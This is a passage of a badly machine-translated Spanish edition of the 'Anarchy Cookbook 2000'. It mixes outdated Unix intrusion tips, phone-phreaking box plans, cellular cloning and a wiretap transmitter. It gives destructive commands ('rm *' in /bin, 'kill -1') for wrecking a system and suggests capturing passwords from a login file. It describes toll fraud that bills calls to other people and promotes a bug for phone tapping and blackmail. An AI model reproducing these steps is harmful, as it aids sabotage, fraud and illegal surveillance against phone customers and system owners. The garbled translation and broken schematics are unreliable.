Y luego están conectados todo el camino desde ruta1 de ruta3. Usted puedeejecutar los programas en todas las rutas que están conectados. Si lo haceNo le permiten conectarse a un camino, entonces usted tiene privs insuficientes oel camino está cerrado y archivado en cinta. Puede ejecutar los programas de esta manera

Page 127: 106652012 the Anarchy Cookbook 2000 Es

también:

que => path1/path2/path3/program-name

Unix trata todo como un programa, y por lo tanto hay unos cuantos comandos aprender a ...Para ver lo que usted tiene acceso a la ruta de extremo, escriba:

ls

para la lista. Esto mostrará los programas que puede ejecutar. Se puede conectar en el directorio raíz y ejecutar los programas con =>

/ Root

Por cierto, la mayoría de sistemas Unix tienen su archivo de registro en la raíz, por lo que puede configurar un reloj en el archivo, a la espera para que la gente entrar y arrebatarle su contraseña a medida que pasa a través del archivo. Para conectarse a un directorio, utilice el comando:

=> Cd ruta de acceso

Esto le permite hacer lo que quiera con ese directorio. Se le puede pedir una contraseña, pero esta es una buena manera de encontrar otros nombres de usuario para hackear a. El carácter comodín en unix, si desea buscar un camino para un juego o algo así, es el archivo *.

=> Ls / *

En caso de que muestran lo que usted puede acceder. Los tipos de archivo son los mismos que están en un diciembre, por lo que se refieren a la sección de la hora de examinar el archivo. Para ver lo que está en un archivo, utilice el

=> Pr

nombre del archivo de comandos, para el archivo de impresión. Le recomendamos jugar con los nombres de ruta para conseguir la caída del concepto. Hay ayuda en línea disponible en la mayoría de los sistemas con una 'ayuda' o un '?'. Le recomendamos que mirar a través de los archivos de ayuda y prestar atención a todo lo que usted da por rutas de acceso, o los comandos para el sistema. Puede, como usuario, crear o destruir los directorios en el árbol por debajo de ti. Esto significa que la raíz puede matar todo menos la raíz, y puede matar a cualquiera que esté por debajo de usted. Estos son el

=> Mkdir ruta=> Rmdir nombre de ruta

comandos. Una vez más, usted no está solo en el sistema ... type =>

que

para ver lo que otros usuarios se registran en el sistema en ese momento. Siquiero hablar con ellos =>

escribir nombre de usuario

Le permitirá chatear al mismo tiempo, sin tener que preocuparse por el analizador. Para enviar correo a un usuario, por ejemplo

=> Electrónico

Y entrar en el sub-sistema electrónico. Para enviar un mensaje a todos los usuarios del sistema, digamos

Page 128: 106652012 the Anarchy Cookbook 2000 Es

=> Pared

¿Qué significa 'escribir todo'. Por cierto, en algunos sistemas, todo lo que tienes que hacer es presionar la tecla <return> para finalizar el mensaje, pero en otros se debe presionar la tecla CTRL-D. Para enviar un único mensaje a un usuario, por ejemplo

=> Escribir nombre de usuario

esto es muy útil una vez más! Si envía la secuencia de caracteres discutidos en el principio de este artículo, usted puede tener la terminal de super-usuario hacer trucos para que usted de nuevo.

Privs:Si desea privs de superusuario, puede iniciar sesión como root, o editar su Cuenta. por lo que puede decir

=> Su

esto ahora le da el símbolo #, y le permite por completo de by-pass de la protección. Los desarrolladores de seguridad maravillosas conscientes de la campana hizo muy difícil de hacer mucho sin privs, pero una vez que los tiene, no hay absolutamente nada que nos impida hacer lo que quieras. Para derribar un sistema UNIX:

=> Chdir / bin=> Rm *

Esto elimina la papelera de ruta, donde todos los archivos de mantenimiento del sistema son. O pruebe:

=> R-r

Esto elimina sucesivamente todo, desde el sistema, excepto el comando remove sí mismo. O pruebe:

=> Matar a -1,1=> Sincronización

Esto elimina los dispositivos del sistema de la operación. Cuando por fin enfermo y cansado de la piratería en los sistemas VAX, acaba de golpear a su CNTL-d y la repetición de las teclas, y que finalmente se cerrará la sesión.

La razón de este archivo parece ser muy superficiales es el hecho de que la campana tiene 7 versiones con licencia de Unix a cabo en el dominio público, y estos comandos son los comunes a todos ellos. Te recomiendo que cortar en el directorio raíz o el recipiente, ya que tienen los niveles más altos de privs, y no hay realmente mucho que puede hacer (excepto el desarrollo de software) sin ellos.

Circuitos 108.Verification de The Jolly Roger

1. Uno de los circuitos ocupados conferencia de verificación siempre se ofrece. El circuito es un puente de conferencia de tres vías que permite a un operador para verificar la condición de ocupado / vacío de una línea de abonado. A petición de una de las partes tratando de llegar a un número de directorio especificado, los diales de operador el número de línea llamado a determinar si la línea está en uso, si el receptor está descolgado, o si la línea está en bloqueo debido a una condición de falla. El operador entonces devuelve a la parte tratando de alcanzar el número de directorio y establece la condición de la línea. Las líneas con la seguridad de datos no se puede acceder para la verificación de ocupado cuando la línea está en uso. (Véase también la seguridad de los datos.)

2. Tres puertos se asignan a cada circuito de verificación de conferencias ocupado. Un puerto es para el acceso del operador y dos puertos se utilizan para dividir una

Page 129: 106652012 the Anarchy Cookbook 2000 Es

conexión existente. Para verificar la condición de ocupado / vacío de la línea, el operador establecido una conexión con el puerto de acceso del operador y marca el número de directorio de la línea para ser verificada. Si la línea está en uso, la conexión existente se rompe inmediatamente y restablecido a través de los otros dos puertos del circuito de verificación ocupado sin interrupción. Circuito de verificación de ocupado está controlada por código de acceso. Un tronco dedicado puede ser utilizado, pero no es necesario.

3. El circuito de verificación de ocupados también se puede utilizar para la prueba de verificación de los jefes de cables de prueba del panel B. adicionales de verificación de circuitos ocupados de conferencias (002.749) que es a la derecha de una palabra por palabra las instrucciones SEE! Y yo estoy de 25 metros lineales de los manuales de ESS! Sin contar la pila recibido hasta ahora!

Caja 109.White los planes del Jolly Roger

Introducción:La Caja Blanca es más que un portátil de teclado de marcación por tonos. Para obtener más información sobre la marcación por tonos, ver a mis planes de caja de plata.

Materiales:• Un teclado de marcación multifrecuencia• Una miniatura de 1000 a 8 ohmios transformador (Radio Shack # 273 a 1.380)• Un estándar de 8 ohmios Altavoz• 2 baterías de 9V• 2 de 9V Batería Clips

Procedimiento:1. Conecte el cable rojo del transformador de cualquiera de los terminales del

altavoz.2. Conecte el cable blanco del transformador al otro terminal del altavoz.3. Conecte el cable rojo del clip de la batería una al cable Negro desde el clip de la

batería otra.4. Conecte el cable rojo del clip segunda batería al cable verde del teclado.5. Conecte el cable azul del teclado para que el cable Naranja / Negro desde el

teclado.6. Conecte el alambre Negro del clip de la batería primero a los dos cables anteriores

(Azul y Negro / Naranja).7. Conecte el cable Negro desde el teclado para que el cable azul del transformador.8. Conecte el cable rojo / verde de la caja electrónica con el cable verde del

transformador.9. Asegúrese de que el cable Negro desde el transformador y los cables restantes desde

el teclado son gratuitos.10. Conecte las baterías.

Opcional:1. Ponga todo en un caso.2. Añadir una caja de plata a la misma.

Uso:Sólo lo utilizan como un teclado normal, excepto poner el altavoz al lado del receptor del teléfono que está utilizando.

Caja BLAST 110.The por The Jolly Roger

¿Alguna vez quiso hacer realmente a ti mismo ser escuchado? ¿Alguna vez habla con alguien por teléfono que simplemente no se calla? O simplemente llame a la operadora y el pop de su tímpano? Bueno, hasta hace poco no ha sido posible para que usted pueda hacer estas cosas. Es decir, a menos por supuesto que tienes una caja de explosión. Todo lo que un cuadro de explosión se, es un amplificador muy barato, (alrededor de 5

Page 130: 106652012 the Anarchy Cookbook 2000 Es

vatios, más o menos) conectada en lugar del micrófono de su teléfono. Funciona mejor en el modelo 500 de AT & T Móviles, y si se construye lo suficientemente pequeño, se puede colocar en el interior del teléfono.

Construcción:La construcción no es realmente importante. Pues lo es, pero ya que estoy dejando de hacersu amplificador, yo realmente no tiene que incluir esto.

Uso:Una vez que hayas construido tu casilla de explosión, sólo tiene que conectar un micrófono (o usar el micrófono del teléfono) a la entrada del amplificador, y listo. Ahí está. Ahora bien, lo creas o no, este dispositivo funciona en realidad. (Por lo menos en el travesaño.) Parece que Illinois campana de sistemas de conmutación permite un buen montón de corriente para pasar a través de la conmutación de la oficina, y fuera a quien está llamando. Cuandousted habla en el teléfono, sale del otro teléfono (de nuevo funciona mejor si el teléfono que está llamando tiene el estándar del auricular Western Electric) increíblemente fuerte. Este dispositivo es especialmente bueno para las unidades de suscripción de PBS. Tener "Phun", y que no te pillen!

111.Dealing con la Tasa y Operador de Ruta por la Jolly Roger

Parece que cada vez menos personas tienen cuadros azules en estos días, y eso es realmente tan malo. Cajas azules, aunque no tan grande para realizar llamadas gratuitas (ya que la TPC puede decir cuando se hizo la llamada, así como cuando ya era demasiado y desde), son realmente muy divertido para jugar. Antes de convertirse en un operador real TSPS en vivo, son la única forma que realmente se puede jugar con la red.

Para los pocos de ustedes con cuadros azules, aquí están algunas frases que pueden hacer la vida más fácil cuando se trata de la tasa y la ruta (R & R) operadores. Para obtener el op R & R, se envía un PK 141 + + ST. En algunas zonas puede que tenga que poner otro antes de que el NPA 141 (es decir, PK + 213 + 141 + ST), si usted no tiene R & R local ops.

El operador R & R tiene una gran cantidad de información, y todo lo que se necesita para obtener estos datos se mascullando frases crípticas. Hay básicamente cuatro frases especiales para dar las operaciones de R & R. Se trata de la ruta NÚMEROS, ruta DIRECTORIO, la ruta del operador, y nombre del lugar.

Para obtener un R & R, un código de área de una ciudad, se puede llamar a la operadora R & R y pregunte por la ruta de los números. Por ejemplo, para encontrar el código de área para Carson City,Nevada, Nos gustaría pedir a la OP R & R "Carson City,Nevada, Ruta de los números, por favor. "Y obtener la respuesta," la derecha ... 702 más. "Lo que significa que 702, más 7 dígitos que nos llega.

A veces el servicio de información no es sólo el NPA 131. La manera de conseguir estas rutas es llamar a R & R y pedir "Anaheim,California, El directorio de la ruta, por favor. "Por supuesto, ella nos decía que era más el 714, lo que significa 714 + 131 nos lleva de la DA existe op. Esta es una especie de ejemplo, sin sentido, pero no pude llegar a una mejor a corto plazo.

Digamos que usted quería saber cómo llegar a que el operador hacia el interior de Sacremento,California. Los primeros seis dígitos de un número en esa ciudad será necesario (el NPA y un NXX). Por ejemplo, vamos a utilizar 916 756. Podríamos llamar a R & R, y cuando la operadora que obtienen respuesta, por ejemplo, "916 756, vía operadora, por favor." Laoperador diría, "916 más 001 más." Esto significa que 916 + 001 + 121 te llevará hacia el interior para el operador Sacramento. ¿Sabe usted la ciudad que corresponde a 503 640? El operador R & R lo hace, y le dirá que se trata de Hillsboro,Oregón, Si lo pide con dulzura ", nombre del lugar, 503 640, por favor."

Page 131: 106652012 the Anarchy Cookbook 2000 Es

Por ejemplo, digamos que usted necesita la ruta de directorio para Sveg,Suecia. Simplemente llame al R & R, y pedir, "Internacional, Baden,Suiza. Ruta TSPS directorio, por favor. "En respuesta a esto, se obtendría," Derecho ... Directorio de Sveg,Suecia. Código del país 46, más de 1170. "Así que te ruta por sí mismo a un emisor internacional, y enviar 46 + 1170 para obtener el operador de DA en Suecia.

Rutas de tráfico de perfeccionamiento activo operador a varios países se obtienen de la misma manera "internacional, Londres,Inglaterra, La ruta hacia el interior TSPS, por favor. "Y obtener" Código del país 44 más 121. "Por lo tanto, el 44 por 121 más que hace hacia el interior de Londres.

Hacia el interior se puede conseguir ayuda con el idioma si no hablas el idioma. Dígale a la interna extranjera "Estados Unidos llamando. Idioma ayuda para completar una llamada a (la parte llamada) al (número de llamada). "

R & R operadores son las personas también son personas, ya sabes. Así que siempre ser cortés, hacer un uso seguro de 'em, y marcar con cuidado.

Phreaking 112.Cellular por The Jolly Roger

El sistema de teléfono celular / móvil es el que está perfectamente configurada para ser explotada por phreaks con el conocimiento adecuado y el equipo. Gracias a la desregulación, el BOC regional (compañías operadoras de Bell) se encuentran dispersos y no se comunican mucho entre sí. Phreaks pueden tomar ventaja de esta fingiendo ser clientes de telefonía móvil, cuya "base" es una ciudad servida por otro BOC, conocido como un "vagabundo". Dado que es poco práctico para cada uno de BOC para realizar un seguimiento de los clientes de todos los demás de BOC, por lo general permiten que el cliente para hacer las llamadas que desee, a menudo con un recargo de algún tipo.

El proyecto de ley se envía entonces a la casa de BOC del roamer para la colección. Sin embargo, es bastante sencillo (con las herramientas correctas) para crear un número de identificación falsa para su teléfono móvil, y pretende ser un vagabundo de alguna otra ciudad y el estado, que es "sólo de visita". Cuando el BOC trata de cobrar por las llamadas de su supuesta "BOC casa", se descubre que no es un cliente real, pero para entonces, puede crear una identidad electrónica completamente nueva, y utilizar en su lugar.

¿Cómo funciona el sistema celular saber quién está llamando, y ¿dónde están? Cuando un móvil entra en el área de una célula de transmisión, transmite su número de teléfono y su 8 número de identificación de dígitos a esa célula, que seguirá la pista de ella hasta que se obtiene lo suficientemente lejos que la calidad del sonido es suficientemente reducido y, a continuación el teléfono está "fuera entregado" a la celda que el cliente ha caminado o conducidos al. Este proceso continúa mientras el teléfono está encendido y está encendida. Si el teléfono está apagado (o el coche), alguien que intenta llamar al teléfono móvil recibirá una grabación en la línea de "El cliente de telefonía móvil que ha marcado ha dejado el vehículo o expulsados de la zona de servicio." Cuando se realiza una llamada a un teléfono móvil, el equipo de conmutación, lo examinará para ver si el teléfono móvil que se llama "conectado", por así decirlo, o están presentes en una de las celdas. Si es así, la llamada será entonces actuar (a las partes que hablan) al igual que una llamada normal - la persona que llama puede escuchar un tono de ocupado, el teléfono puede sonar justo, o la llamada puede ser contestada.

¿Cómo funciona el equipo de conmutación saber si un teléfono en particular está autorizado a utilizar la red? Muchas veces, no es así. Cuando un distribuidor instala un teléfono móvil, que da el número de identificación del teléfono (un número hexadecimal de 8 dígitos) para el local de BOC, así como el número de teléfono del BOC asignado al cliente. Después de ello, cuando un teléfono está presente en una de las células, los dos números se comprueban - lo que deben registrarse a la misma persona. Si no coinciden, la empresa de telecomunicaciones sabe que un intento de fraude se lleva a cabo (o en el mejor de los casos, un error de transmisión) y no permite las llamadas a ser colocada o recibida en el teléfono. Sin embargo, no es práctico

Page 132: 106652012 the Anarchy Cookbook 2000 Es

(especialmente en el estado actual de la desregulación) para la compañía de telecomunicaciones para tener registros de cada cliente celular de cada BOC. Por lo tanto, si usted va a crear una falsa ID / teléfono combinación de números, tendrá que ser "la base" en una zona que tiene un sistema celular (obviamente), tiene una diferente BOC de su área local lo hace, y tiene algo de una especie de "vagabundo"acuerdo con su oficina local BOC.

¿Cómo se puede "Phreak" un teléfono celular? Hay tres áreas generales en que phreaking teléfonos celulares, con una que se encuentra en un automóvil abierto (o de un paseo sin vigilancia-sobre el modelo), la modificación de su propio chip configuradas como un teléfono diferente, o para grabar el número de teléfono / Identificación de combinaciones de números enviado por otros teléfonos celulares, locales y con los de la suya. Mayoría de los teléfonos celulares son un crudo "contraseña" del sistema para mantener a los usuarios no autorizados utilicen el teléfono - Sin embargo, los comerciantes suelen establecer la contraseña (por lo general un código de 3 a 5 dígitos) para los últimos cuatro dígitos del número del cliente móvil. Si usted puede encontrar que en algún lugar en el teléfono, estás de suerte. Si no es así, no debería ser demasiado difícil de hackear, ya que la mayoría de la gente no es lo suficientemente inteligente como para usar algo más que "1111", "1234", o lo que sea. Si desea modificar el conjunto de chips en un teléfono móvil que compró (o robado), hay dos fichas (por supuesto, esto depende del modelo yfabricante, el tuyo puede ser diferente), que tendrá que ser cambiado - una instalada en el fabricante (a menudo en el epóxido) con número de identificación del teléfono, y uno instalado por el proveedor con el número de teléfono y el código de seguridad posible. Para ello, es obvio que necesita una grabadora de EPROM, así como el mismo tipo de chips utilizados en el teléfono (o un distribuidor de fácil y sin escrúpulos!). En cuanto al registro de los números de otros clientes de telefonía móvil y el uso de ellos, según lo que yo sé, esto es sólo la teoría ... pero parece muy posible, si usted tiene el equipo para grabar y decodificarlo. El sistema celular probablemente se asuste si dos teléfonos (con combinaciones de números válidos de identificación / teléfono) estaban presentes en la red a la vez, pero queda por ver qué va a pasar.

113.Cheesebox los planes del Jolly Roger

Un Cheesebox (llamado así por el tipo de caja se encontró el primero en) es un tipo de caja que, en efecto, hacer que su teléfono de un teléfono público ..... Esta es una manera simple, modernizada, y fácil de hacerlo ....

Dentro de Información: Estos se utilizaron por primera vez por corredores de apuestas hace muchos años como una manera de hacer las llamadas a la gente sin ser llamado por la policía o de tener sus números de trazado y / o tocó ......

Cómo hacer una caja de queso moderno

Ingredientes:• Un servicio de reenvío de llamadas en la línea de• Un conjunto de tonos Red Box• El número de operador de interceptar su prefijo de (hacer algo de exploración de

éste)

Cómo:Después de encontrar el número del operador de intersección en el prefijo, utilizar su reenvío de llamadas y enviar todas las llamadas a su ... esto hará que el teléfono permanezca fuera del gancho (en realidad, ahora se espera a que entre un cuarto y se dejó caer en el) ... ahora tiene una caja de queso ... Para llamar fuera en esta línea: Usted debe usar los tonos de Red Box y generar el trimestre caer adentro .. entonces, usted puede hacer llamadas telefónicas a las personas ... hasta donde yo sé, esto es bastante seguro, y no marque mucho ... Aunque no estoy seguro, creo que incluso se puede hacer con tarjeta de crédito-las llamadas desde un teléfono cheesebox y no se remonta ...

Page 133: 106652012 the Anarchy Cookbook 2000 Es

114.How para iniciar sus propias conferencias! por The Jolly Roger

Bart negro mostró cómo iniciar una llamada de conferencia a través de un intercambio de 800, y ahora explicaré cómo iniciar una llamada de conferencia de una manera más ortodoxa, la 2600Hz. Tono.

En primer lugar, la compañía fone tiene lo que se denomina sistemas de conmutación. Hay varios tipos, pero la vamos a ocuparnos, es ESS (Electronic Switching System). Si su área está zonificada para la ESS, no iniciar una llamada de conferencia a través de la 2600Hz. Tono, o de seguridad campana uñas de su culo! Para averiguar si usted es menor de ESS, llame a su oficina local de negocios, y les pregunta si usted puede conseguir la llamada en espera / reenviar, y si es posible, lo que significa que usted está en el país del SEE, y llamadas de conferencia es muy, muy peligroso! ! Ahora bien, si usted no está en la ESS, se necesita el siguiente equipo:

• Una Manzana CAT II del módem• Una copia de TSPS 2 o maullido de gato• Una línea de marcación por tonos fone• Un fono de tonos. (Tono de verdad)

Ahora, con TSPS 2, haga lo siguiente:

1. Ejecutar 2 cucharaditas2. Elija la opción 13. Elija la opción 64. Elija sub-opción 95. Ahora escribe: 1-514-555-1212 (los guiones no son necesarios)6. Escucha con tu teléfono, y tan pronto como se oye un chasquido, a continuación,

escriba: $7. Para generar el hz 2600. Tono. Este tono molesto continuará para unos pocos8. Segundos, y luego escuchar otra vez y usted debería escuchar otra voz alta "clic".9. Ahora escribe: km2130801050s

• 'K' = kp tono• 'M' = modo multifrecuencia• El tono de 'S' = s

10. Ahora escuche el teléfono otra vez, y espere hasta que escuche el 'clic' de nuevo. A continuación, escriba: km2139752975s

• 2139751975 es el número de factura de la conferencia para llamar.

Nota: 213-975-1975 es un número de desconectados, y te aconsejo que sólo pago para la llamada a este número, o la compañía de fone se encuentra, y luego .. recuerda, llamadas de conferencia se detallan, por lo que si se realiza la facturación que el número de un enemigo, puede fácilmente averiguar quién lo hizo y él te puede reventar!

Ahora debería escuchar 3 pitidos, y un mensaje corto pre-grabado. A partir de aquí, todo está controlado por menú.

Comandos de llamada de conferenciaDesde el '#' modo:

• 1 = llamar a un número• 6 = transferencia de control• 7 = cuelga la llamada de conferencia• 9 = llamar a un operador de la conferencia

Manténgase alejado de las 7 y 9! Si por alguna razón un operador entra en línea, cuelgue! Si usted recibe una señal de ocupado después de km2130801050s, lo que significa que la línea está temporalmente fuera de teleconferencia. Prueba más tarde, preferiblemente de 9 a.m. a 17:00 días de la semana, ya que las llamadas de conferencia están diseñadas principalmente para gente de negocios.

Page 134: 106652012 the Anarchy Cookbook 2000 Es

Caja 115.Gold los planes del Jolly Roger

¿Cómo construirlaUsted necesitará lo siguiente:• Dos OHM 10K y tres resistencias de 1.4K OHM• Dos transistores 2N3904• Dos células de las fotos• Dos LED rojos (más luz produjo el mejor)• Una caja que no permitirá que la luz en• Cable rojo y verde

La luz del LED # 1 debe brillar directamente sobre la célula fotoeléctrica # 1. La caja de oro que hizo necesaria la parte superior del LED para tocar la célula fotoeléctrica para que funcione.

Lo mismo se aplica a la celda # 2 foto y el LED.

1 :-FOTOCÉLULA -: :: BASE :: : 1 TTTTT : + LED-TRANS : TTTTT ::: :-I (- :: COLECTORRED1 - <>: - :: -------: ----- GREEN2 -I (-: ----------: :: 2 :-/ + / + / - / + / + / - / + / + / - / + / + / LED 10K 10K 1.4K 1.4K Resistores

2 -FOTOCÉLULA ----------------- :: : BASE: TTTTT: TRANSISTOR: TTTTT: :: EMISOR:GREEN1--------------------------- RED2 :: / + / + / 1.4K

La resistencia de 1.4K es variable y si la segunda parte de la caja de oro se pasa por alto que seguirá funcionando, pero cuando alguien coge el teléfono que se escucha el tono débil en el fondo y para que informe a la Gestapo er ... ( AT & T). 1.4K le dará una buena recepción con poco riesgo de un agente de la Gestapo en su puerta.

Ahora que usted ha construido tomar dos cables verdes de la misma longitud y tira de los extremos, haga girar dos extremos y conectarlos a green1 y colocar un pedazo de cinta adhesiva con "la línea # 1" escrito en él.

Continúe el proceso con red1 sólo utilizan el cable rojo. Repita el procedimiento con red2 y green2, pero cambiar a la línea # 2.

COMO INSTALARUsted tendrá que encontrar dos líneas de teléfono que están muy juntos. Etiqueta de una de las líneas telefónicas "Línea n º 1". Cortar las líneas telefónicas y tomar el

Page 135: 106652012 the Anarchy Cookbook 2000 Es

revestimiento exterior de ella. No debe haber 4 hilos. Cortar los cables amarillo y negro apagado y pelar los cables rojo y verde para ambas líneas.

Línea n º 1 debe ser en dos piezas. Tomar el hilo verde de un extremo y conectarlo a uno de los cables verdes en la caja de oro. Tomar la otra mitad de la línea N º 1 y conectar el cable verde libre para el cable verde en la línea telefónica. Repita el proceso con red1 y la otra línea. Todo lo que necesitas hacer ahora es escribir los números de teléfono del lugar donde lo conectados en y volver a casa y lo llaman. Usted debe obtener un tono de llamada! Si no, pruebe a cambiar el emisor con el colector.

Historia 116.The de ESS por The Jolly Roger

De todas las nuevas 1960 maravillas de la tecnología telefónica-satélites, de ultra posiciones modernos servicios de tránsito aéreo (TSP) para los operadores, Picturephone, y en la manera - el que dio los Laboratorios Bell de la mayoría de los problemas, e inesperadamente se convirtió en el mayor esfuerzo de desarrollo en Bell System la historia, era la perfección de un sistema de conmutación electrónica, o ESS.

Cabe recordar que este sistema era el fin específico, habida cuenta que el proyecto que culminó con la invención del transistor se había iniciado en los años 1930. Después de la realización exitosa de ese milagro prevista en 1947-48, más retrasos fueron puestas en marcha por la austeridad financiera y la necesidad de un mayor desarrollo del propio transistor. En la década de 1950, un equipo de los laboratorios comenzaron a trabajar en serio en la conmutación electrónica. Ya en 1955, Western Electric se involucró cuando cinco ingenieros de la Hawthorne obras fueron asignados a colaborar con los laboratorios en el proyecto. El presidente de AT & T en 1956, escribió con confianza: "En Bell Labs, el desarrollo del sistema de conmutación electrónica nueva que va a toda velocidad. Estamos seguros de que esto dará lugar a muchas mejoras en el servicio y también a una mayor eficiencia. El juicio servicio de primera comenzará en Morris,Illinois, En 1959. "Poco después, Kappel dijo que el costo de todo el proyecto, probablemente sería de $ 45 millones.

Pero poco a poco se hizo evidente que el desarrollo de un sistema de conmutación electrónica utilizable comercialmente - en efecto, una central telefónica computarizada - presenta mucho mayores los problemas técnicos que se había previsto, y que, en consecuencia, los laboratorios Bell había subestimado enormemente el tiempo y la inversión de la necesaria para hacer el trabajo. El año 1959 transcurrió sin la primera prueba en la prometida Morris,Illinois, Se hizo finalmente en noviembre de 1960, y rápidamente se mostró como mucho más trabajo que queda por hacer. Con el tiempo se prolongó y se montan los costos, hubo una preocupación por AT & T y algo que se acerca el pánico en los Laboratorios Bell. Sin embargo, el proyecto tenía que ir hacia adelante; en ese momento la inversión era demasiado grande para ser sacrificado, y en todo caso, adelantar las proyecciones de aumento de la demanda para el servicio telefónico indicó que dentro de pocos años que vendría un tiempo cuando, sin el salto cualitativo en la velocidad y flexibilidad que proporcionaría conmutación electrónica, la red nacional sería incapaz de satisfacer la demanda. En noviembre de 1963, un sistema de conmutación totalmente electrónico entró en uso en la Compañía de Ingeniería de Brown en Cocoa Beach,Florida. Pero se trataba de una instalación pequeña, esencialmente otra instalación de prueba, que sirve ser una única empresa. Tono de Kappel en este asunto en el informe anual de 1964 fue, para él, un casi de disculpa: "los equipos de conmutación electrónica deben ser fabricados en el volumen de las normas de fiabilidad sin precedentes .... Para convertirse en el equipo económico y con buena velocidad, la producción en masa métodos deben ser desarrollados, pero, al mismo tiempo, no puede haber pérdida de precisión ... " Otro año y millones de dólares más tarde, el 30 de mayo 1965, El primer comercial de la oficina central eléctrica se puso en servicio en el Succasunna,Nueva Jersey.

Incluso en Succasunna, sólo 200 de los 4.300 abonados de la ciudad inicialmente tenía la ventaja de mayor velocidad de conmutación electrónica y los servicios adicionales, tales como la provisión de tres conversaciones del partido y la transferencia automática de llamadas entrantes. Pero después de eso, ESS estaba en camino. En enero de 1966, la segunda instalación comercial, esta una porción de 2.900 teléfonos, entró

Page 136: 106652012 the Anarchy Cookbook 2000 Es

en servicio en Persecución,Maryland. A finales de 1967 había otras oficinas del SEE en California,Connecticut,Minnesota,Georgia, Nueva York, Florida, Y Pensilvania, A finales de 1970 había 120 oficinas que atienden 1,8 millones de clientes, y en 1974 había 475 oficinas que atienden a 5,6 millones de clientes.

La diferencia entre el cambio convencional y de conmutación electrónica es la diferencia entre "hardware" y "software", en el primer caso, el mantenimiento se lleva a cabo sobre el terreno, con un destornillador y unas pinzas, mientras que en el caso de la conmutación electrónica, se puede hacer de forma remota , por ordenador, desde un punto central, por lo que es posible tener sólo una o dos técnicos en servicio en un momento en cada centro de conmutación. El programa de desarrollo, cuando las cifras finales se suman, se encontró que han requerido la asombrosa cifra de cuatro mil años-hombre de trabajo en los Laboratorios Bell y no le han costado $ 45 millones, pero $ 500 millones!

Lunch Box 117.The por The Jolly Roger

IntroducciónLa lonchera es un transmisor muy simple que puede ser útil para todo tipo de cosas. Es bastante pequeño y se puede poner fácilmente en un número de lugares. He utilizado con éxito para los fones de tapping, meterse en las cosas información, chantajes y otras tales. Las posibilidades son infinitas. También se incluyen los planes o un receptor igualmente pequeño de su juguete recién hecho. Se usa para casi cualquier cosa. También puede hacer que el transmisor y el receptor juntos en una caja y lo utilizan como un walkie talkie.

Los materiales que se necesitan• (1) batería de 9 voltios con el clip de la batería• (1) 25-MFD, 15 voltios condensador electrolítico• (2) 0047 condensadores Mfd• (1) 0,022 MFD condensador• (1) 51 pF condensador• (1) 365 pf condensador variable• (1) transistor bobina de la antena• (1) 2N366 transistor• (1) 2N464 transistor• (1) resistencia de 100k• (1) resistencia de 5,6 K• (1) resistencia de 10k• (1) Potenciómetro con interruptor SPST 2meg• Algunos alambre bueno, soldadura, soldador, tablero para poner, caja (opcional)

Esquema para la loncheraEsto se puede conseguir un poco confuso, pero acaba de imprimir y prestar atención.

[!] ! 51 pf ! --- + ---------------- Base de coleccionistas ! ) (2N366 + ---- + ------ / \ / \ / ---- GND 365 PF () emisor! ! ) (! + ----------- + ----! ! ! ! ! ! ! GND / 0,022 MFD! ! 10k \! ! ! / GND + ------------------------ emisor ! ! ! 2N464 / 0,0047! base de coleccionistas

Page 137: 106652012 the Anarchy Cookbook 2000 Es

2meg \ ---- +! ! + -------- +! /! GND! ! ! GND! ! ! + ------------- + 0.0047 + -------------------- +! ! ! + - + ----- 25mfd ----------------------------------------- +! ! Micrófono + - / \ / \ / ----- + --------------------------------------------- + 100k! ! GND ----> / <---------------------! +! +! + --------------- + cambiar Batería de la olla 2meg.

Notas sobre el esquema1. GND significa tierra2. El GND cerca del interruptor y la masa de la 2meg por el potenciómetro debe estar

conectado.3. Donde usted ve:) ( () ) (Que es la bobina de la antena de transistores con 15 vueltas de

regular de transmisión en circuito con alambre.4. La media del bucle en el lado izquierdo (a la izquierda de "()") se debe ejecutar

un cable hasta el "+" que no tiene nada que se le atribuye. Hay un condensador .0047 en la pieza correcta de alambre.

5. Para utilizar el micrófono de un auricular magnética (1k a 2k).6. Cuando vea "[!]" Es la antena. El uso de unos 8 metros de cable para transmitir

aprox. 300 pies. 15 de las normas de la FCC y la regulación dice que no puede emitir más de 300 metros sin una licencia. (Jajaja). Utilice más cable de una antena para largas distancias. (Adjuntar a el cable negro en la línea de fono por alrededor de una antena de 250 pies!)

El funcionamiento de la Caja de AlmuerzoEste transmisor envía las señales en la banda de radio AM. Se utiliza el condensador variable para ajustar la frecuencia de lo que. que desea utilizar. Buscar una frecuencia no utilizada bueno. abajo en el extremo inferior de la escala y listo. Utilice la olla de 2 megas. para ajustar la ganancia. Sólo la mierda con él hasta que usted consigue lo que suena bien. El interruptor de la 2meg es para abrir la caja de almuerzo encendido y apagado. Cuando todo se ajusta, encender una radio AM ajustarlo a donde crees que es la señal. Pídale a un amigo estaba algo de mierda a través de la Caja y sintonizar con ella. Eso es todo lo que hay que hacer. Los planes para un receptor simple se muestra a continuación:

El receptor de Lunch Box• (1) batería de 9 voltios con el clip de la batería• (1) 365 pf condensador variable• (1) 51 pF condensador• (1) 1N38B diodo• (1) transistor bobina de la antena• (1) 2N366 transistor• (1) SPST interruptor de palanca• (1) 1k de auriculares magnética 2k

Esquema para el receptor

[!] ! 51 pf ! + ---- + ---- + ! ! ) De 365 pf

Page 138: 106652012 the Anarchy Cookbook 2000 Es

(---- +! )! ! + --------- + --- GND ! + --- *>! ---- Base de coleccionistas ----- diodo 2N366 auriculares emisor + ----- ! ! GND! - + - De la batería + GND ------> / <------------ + cambiar

Declaración de clausuraEstos dos dispositivos se puede construir por menos de un total de $ 10.00. No está mal. El uso de estos dispositivos de manera ilegal es su opción. Si te pillan, que no aceptan ninguna responsabilidad por sus acciones. Esto puede ser muy divertido si se usan correctamente. Conéctelo al cable rojo en la línea de teléfono y se enviará la conversación a través de las ondas del aire.

Caja 118.Olive los planes del Jolly Roger

Se trata de una caja relativamente nuevo, y todo lo que básicamente hace es servir como un timbre de teléfono. Usted tiene dos opciones para timbres, un transductor piezoeléctrico (el timbre), o un estándar de 8 ohmios. El altavoz tiene un tono más agradable para él, pero tampoco lo hará bien. Este circuito también puede ser utilizado en conjunción con una caja de óxido de controlar un algo externo o de otro cuando suena el teléfono. Sólo tiene que conectar la salida del altavoz de 8 ohmios a las entradas en el cuadro de la roya, y controlar el bote para ajustarlo a la luz la luz (que puede ser sustituido por un relé para control externo) cuando suena el teléfono.

